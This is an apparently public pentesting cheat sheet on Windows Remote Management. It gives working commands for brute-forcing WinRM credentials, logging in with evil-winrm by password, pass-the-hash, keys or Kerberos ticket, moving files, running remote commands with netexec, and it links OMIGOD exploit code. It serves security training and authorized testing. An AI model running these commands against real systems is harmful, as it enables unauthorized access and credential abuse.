# WinRM (Windows Remote Management) Pentesting

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt 

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
```

### Connect <a href="#connect" id="connect"></a>

[**Evil-WinRM**](https://github.com/Hackplayers/evil-winrm) is a Windows Remote Management shell for pentesting.\
Below are list of commands for each situation.

#### Using Username/Password <a href="#using-usernamepassword" id="using-usernamepassword"></a>

```
evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
```

If you have private key and public key, you can use them for authentication.

```
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
```

#### Using Kerberos Authentication <a href="#using-kerberos-authentication" id="using-kerberos-authentication"></a>

If we have a Kerberos ticket of a user, we can login with its ticket, but some settings are required.\
At first, we need to modify the `nameserver` value in the `/etc/resolv.conf` in our attack machine.

```
nameserver <target-ip>
```

and modify `/etc/krb5.conf` (or create a new one if it does not exist) in our attack machine as below:

```
[libdefaults]
    default_realm = EXAMPLE.LOCAL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    EXAMPLE.LOCAL = {
        kdc = dc.example.local
        admin_server = dc.example.local
        default_domain = example.local
    }

[domain_realm]
    example.local = EXAMPLE.LOCAL
    .example.local = EXAMPLE.LOCAL
```

Note that `example.local` and `dc.example.local` must be added to `/etc/hosts`.\
Now set the environment variable and login with `evil-winrm`:

```
export KRB5CCNAME=<username>.ccache
evil-winrm -i dc.example.local -r example.local
```

### Commands <a href="#commands" id="commands"></a>

After connecting with `evil-winrm`, we can use a lot of useful commands to exploit.\
Note that **we need to specify the absolute path for uploading and downloading.**

```
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services
```

### Command Execution with NetExec <a href="#command-execution-with-netexec" id="command-execution-with-netexec"></a>

```
# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'

# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
```

### OMIGOD (CVE-2021-38647) <a href="#omigod-cve-2021-38647" id="omigod-cve-2021-38647"></a>

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

* <https://github.com/AlteredSecurity/CVE-2021-38647>
* <https://github.com/horizon3ai/CVE-2021-38647>

### References <a href="#references" id="references"></a>

* [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)